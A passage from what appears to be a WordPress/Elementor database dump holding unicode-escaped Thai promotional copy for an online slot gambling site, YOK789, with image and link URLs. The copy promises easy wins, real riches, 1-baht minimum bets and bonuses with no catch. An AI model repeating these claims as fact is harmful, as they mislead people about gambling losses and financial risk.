\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2364,326,'_thumbnail_id','273'),(2365,326,'_elementor_edit_mode','builder'),(2366,326,'_elementor_template_type','wp-page'),(2367,326,'_elementor_version','3.35.5'),(2368,326,'_elementor_pro_version','3.32.3'),(2369,326,'_wp_page_template','default'),(2370,326,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2371,326,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e21\\u0e2d\\u0e07\\u0e2b\\u0e32\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e17\\u0e33\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e41\\u0e25\\u0e30\\u0e17\\u0e49\\u0e32\\u0e17\\u0e32\\u0e22 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e43\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"d34d1e8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e04\\u0e27\\u0e32\\u0e21\\u0e19\\u0e48\\u0e32\\u0e2a\\u0e19\\u0e43\\u0e08\\u0e02\\u0e2d\\u0e07\\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23 YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"07fc632\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e31\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e44\\u0e14\\u0e49\\u0e21\\u0e35\\u0e41\\u0e04\\u0e48\\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e2d\\u0e19\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e42\\u0e04\\u0e15\\u0e23\\u0e44\\u0e27 \\u0e01\\u0e23\\u0e2d\\u0e01\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e44\\u0e21\\u0e48\\u0e01\\u0e35\\u0e48\\u0e02\\u0e31\\u0e49\\u0e19\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e22\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e01\\u0e43\\u0e2b\\u0e49\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c \\u0e23\\u0e2d\\u0e07\\u0e23\\u0e31\\u0e1a\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e16\\u0e37\\u0e2d\\u0e41\\u0e25\\u0e30\\u0e04\\u0e2d\\u0e21 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e17\\u0e35\\u0e48\\u0e17\\u0e38\\u0e01\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e1b\\u0e25\\u0e2d\\u0e14\\u0e20\\u0e31\\u0e22\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2b\\u0e19\\u0e32 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e27\\u0e48\\u0e32\\u0e02\\u0e49\\u0e2d\\u0e21\\u0e39\\u0e25\\u0e41\\u0e25\\u0e30\\u0e18\\u0e38\\u0e23\\u0e01\\u0e23\\u0e23\\u0e21\\u0e16\\u0e39\\u0e01\\u0e14\\u0e39\\u0e41\\u0e25\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e14\\u0e35 \\u0e17\\u0e35\\u0e48\\u0e2a\\u0e33\\u0e04\\u0e31\\u0e0d\\u0e04\\u0e37\\u0e2d\\u0e21\\u0e35\\u0e17\\u0e35\\u0e21\\u0e14\\u0e39\\u0e41\\u0e25\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e04\\u0e2d\\u0e22\\u0e0b\\u0e31\\u0e1e\\u0e1e\\u0e2d\\u0e23\\u0e4c\\u0e15\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e21\\u0e35\\u0e04\\u0e33\\u0e16\\u0e32\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e1b\\u0e31\\u0e0d\\u0e2b\\u0e32\\u0e40\\u0e01\\u0e34\\u0e14\\u0e02\\u0e36\\u0e49\\u0e19 <\\/span><a href=\\\"https:\\/\\/luca333auto.com\\/\\\"><b>\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e23\\u0e30\\u0e1a\\u0e1a<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e08\\u0e38\\u0e14\\u0e41\\u0e02\\u0e47\\u0e07\\u0e2d\\u0e35\\u0e01\\u0e2d\\u0e22\\u0e48\\u0e32\\u0e07\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e32\\u0e23\\u0e2d\\u0e31\\u0e1b\\u0e40\\u0e14\\u0e15\\u0e40\\u0e01\\u0e21\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e2a\\u0e21\\u0e48\\u0e33\\u0e40\\u0e2a\\u0e21\\u0e2d \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e44\\u0e21\\u0e48\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e08\\u0e33\\u0e40\\u0e08 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e44\\u0e23\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2d\\u0e30\\u0e44\\u0e23\\u0e2a\\u0e14\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e2d\\u0e07 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e01\\u0e32\\u0e23\\u0e2a\\u0e21\\u0e31\\u0e04\\u0e23\\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e04\\u0e37\\u0e2d\\u0e01\\u0e49\\u0e32\\u0e27\\u0e41\\u0e23\\u0e01\\u0e2a\\u0e39\\u0e48\\u0e40\\u0e2a\\u0e49\\u0e19\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e44\\u0e21\\u0e48\\u0e18\\u0e23\\u0e23\\u0e21\\u0e14\\u0e32<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6b44269\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<ul><li><span style=\\\"color: #99cc00;\\\"><b>YOK789 <\\/b><\\/span><b><span style=\\\"color: #99cc00;\\\">\\u0e41\\u0e08\\u0e01\\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21<\\/span> <\\/b><\\/li><\\/ul><p><b><span style=\\\"font-weight: 400;\\\">\\u0e16\\u0e49\\u0e32\\u0e1e\\u0e39\\u0e14\\u0e16\\u0e36\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e38\\u0e49\\u0e21\\u0e17\\u0e35\\u0e48\\u0e08\\u0e31\\u0e1a\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e23\\u0e32\\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e22\\u0e4c\\u0e15\\u0e31\\u0e27\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e42\\u0e1b\\u0e23\\u0e42\\u0e21\\u0e0a\\u0e31\\u0e19\\u0e21\\u0e32\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e21\\u0e48\\u0e21\\u0e35\\u0e01\\u0e31\\u0e4a\\u0e01 \\u0e17\\u0e31\\u0e49\\u0e07\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2a\\u0e21\\u0e32\\u0e0a\\u0e34\\u0e01\\u0e43\\u0e2b\\u0e21\\u0e48 \\u0e42\\u0e1b\\u0e23\\u0e1d\\u0e32\\u0e01\\u0e23\\u0e32\\u0e22\\u0e27\\u0e31\\u0e19 \\u0e41\\u0e25\\u0e30\\u0e01\\u0e34\\u0e08\\u0e01\\u0e23\\u0e23\\u0e21\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e27\\u0e35\\u0e22\\u0e19\\u0e43\\u0e2b\\u0e49\\u0e23\\u0e48\\u0e27\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e15\\u0e25\\u0e2d\\u0e14 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e40\\u0e15\\u0e34\\u0e21\\u0e40\\u0e07\\u0e34\\u0e19\\u0e21\\u0e35\\u0e1e\\u0e25\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e01\\u0e27\\u0e48\\u0e32\\u0e1b\\u0e01\\u0e15\\u0e34 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e1e\\u0e35\\u0e04\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e07\\u0e37\\u0e48\\u0e2d\\u0e19\\u0e44\\u0e02\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e23\\u0e31\\u0e1a\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e44\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e23\\u0e2d\\u0e19\\u0e32\\u0e19 \\u0e41\\u0e04\\u0e48\\u0e01\\u0e14\\u0e23\\u0e31\\u0e1a\\u0e01\\u0e47\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e25\\u0e38\\u0e22\\u0e15\\u0e48\\u0e2d\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e19\\u0e17\\u0e35 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e40\\u0e25\\u0e22\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e21\\u0e35\\u0e1a\\u0e39\\u0e2a\\u0e15\\u0e4c\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e21\\u0e38\\u0e19 \\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e04\\u0e27\\u0e32\\u0e21\\u0e2b\\u0e27\\u0e31\\u0e07\\u0e21\\u0e32\\u0e01\\u0e02\\u0e36\\u0e49\\u0e19\\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e21\\u0e35\\u0e42\\u0e1b\\u0e23\\u0e0a\\u0e48\\u0e27\\u0e22\\u0e14\\u0e31\\u0e19 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e44\\u0e14\\u0e49\\u0e01\\u0e33\\u0e44\\u0e23\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e19\\u0e35\\u0e22\\u0e19 \\u0e46 \\u0e17\\u0e35\\u0e48\\u0e19\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e38\\u0e14\\u0e17\\u0e32\\u0e07 